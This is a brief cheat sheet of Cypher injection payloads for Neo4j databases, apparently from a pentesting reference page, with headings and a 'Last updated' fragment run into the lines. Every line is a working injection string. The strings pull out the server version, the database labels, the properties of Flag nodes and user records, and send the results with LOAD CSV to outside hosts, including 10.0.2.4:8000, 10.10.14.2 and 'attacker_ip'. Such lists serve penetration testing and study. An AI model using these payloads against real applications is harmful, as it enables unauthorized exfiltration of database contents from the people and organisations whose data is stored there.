Cypher injection
Injection
Server version:
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.0.2.4:8000/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //Labels (like columns)
'}) RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip /?l='+label as l RETURN 0 as _0Get information from labels (data)
' OR 1=1 WITH 1 as a MATCH (f:Flag) UNWIND keys(f) as p LOAD CSV FROM 'http://10.0.2.4:8000/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //With WHERE clause:
' OR 1=1 WITH 1 as a MATCH (u:user) WHERE u.id=1 UNWIND keys(u) as p LOAD CSV FROM 'http://10.10.14.2/?' + p +'='+toString(u[p]) as l RETURN 0 as _0 //Last updated